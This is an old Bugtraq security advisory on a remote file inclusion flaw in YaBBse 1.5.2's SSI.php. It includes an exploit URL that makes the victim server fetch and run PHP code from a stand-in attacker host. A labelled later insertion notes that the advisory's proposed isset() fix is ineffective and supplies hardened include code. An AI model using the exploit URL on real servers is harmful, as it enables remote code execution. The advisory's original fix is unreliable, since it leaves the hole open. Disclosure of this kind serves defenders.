Date: 9 May 2003 15:54:48 -0000
From: DownBload <downbload@...mail.com>
To: bugtraq@...urityfocus.com
Subject: II-Labs Advisory: Remote code execution in YaBBse 1.5.2 (php version)

                  [ Illegal Instruction Labs Advisory ]
[------------------------------------------------------------------------]
Advisory name: Remote code execution in YaBBse 1.5.2 (php version)
Advisory number: 13
Application: Yet another Bulletin Board 1.5.2
Vendor: www.yabbse.org
Date: 06.05.2003
Impact: Attacker can execute arbitrary php code
Tested on: *
Discovered by: Dalibor Karlovic & DownBload
Mail me @: downbload@...mail.com
Homepage: www.kamikaza.org



======[ Overview
YaBB is a widely used bulletin board system.



======[ Problem
One of the files included by the main application is vulnerable to
remote code execution if it is accessed directly with certain
parameters.
The file is SSI.php.
A similar bug was discovered in the previous version, YaBB 1.5.1.

SSI.php:
------------------------------------------
include_once ($sourcedir . '/Errors.php');
include_once ($sourcedir . '/Subs.php');
include_once ($sourcedir . '/Load.php');    
------------------------------------------

The $sourcedir variable can be set through the URL, which makes the
script include another PHP file, either local or (if remote inclusion
is enabled in php.ini) remote.
The bug is not exploitable if PHP's register_globals is set to off.




======[ Exploit

The exploit would look like this:
----cut here----
http://www.victim.com/yabbse/ssi.php?sourcedir=http://www.attacker.com
----cut here----

The attacker would place an Errors.php file on his server. The included
code would then be executed on the victim's server.
The attacker's httpd server must not have PHP enabled, because otherwise
the script would be executed there before being sent to the victim.




======[ Solution

Add this line before the include_once() lines mentioned above.

----cut here----
if (!isset($sourcedir)) $sourcedir = "";
----cut here----
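Added example, not code from the advisory or from YaBB SE: a hardened form of the include block quoted from SSI.php, covering both the problem described above and the fix. Because register_globals=on creates $sourcedir from the query string before any script statement runs, isset($sourcedir) is already true in the attack case, so the example assigns the directory unconditionally from a fixed local path and checks that every included file resolves inside it. The function safe_source_path(), the variable $trustedSourceDir and the Sources/ location are assumptions, not names from the project.

```php
<?php
// Added example, not code from the advisory or from YaBB SE: a hardened
// form of the include block quoted from SSI.php. Whatever $sourcedir holds
// when this runs (register_globals=on would have filled it from
// ?sourcedir=...) is discarded and replaced by a fixed local directory.

// Assumption: the board's Sources/ directory sits next to SSI.php.
$trustedSourceDir = dirname(__FILE__) . '/Sources';

// Resolve $name inside $dir. Returns the real path, or null when $name is
// not a bare "Name.php" (so no "..", slashes or URL schemes), the file is
// missing, or the resolved path escapes $dir.
function safe_source_path($dir, $name)
{
    if (!preg_match('/^[A-Za-z0-9_]+\.php$/', $name)) {
        return null;
    }
    $base = realpath($dir);
    $path = realpath($dir . '/' . $name);
    if ($base === false || $path === false) {
        return null;
    }
    // Containment check: the resolved file must sit strictly under $base.
    if (strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// Unconditional assignment is the point: a request-injected $sourcedir
// would pass an isset() test, so a conditional default would not help.
$sourcedir = $trustedSourceDir;

foreach (array('Errors.php', 'Subs.php', 'Load.php') as $file) {
    $path = safe_source_path($sourcedir, $file);
    if ($path === null) {
        // Fail closed instead of falling back to an include_path lookup.
        header('HTTP/1.0 500 Internal Server Error');
        exit('SSI: required source file missing or outside trusted directory');
    }
    include_once $path;
}
```

Turning register_globals off in php.ini remains the first line of defence; the block above keeps SSI.php safe even where that setting cannot be changed.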




======[ Greetz 
Greetz goes to #hr.hackers and #linux <irc.carnet.hr>. 
Special greetz goes to (rand()): St0rm, BoyScout, h4z4rd, finis, Sunnis, 
Fr1c, phreax, StYx, harlequin, LekaMan, Astral and active-security.
Shitz goes to stupid darkman, who will exploit this bug and claim that
he is a great hacker.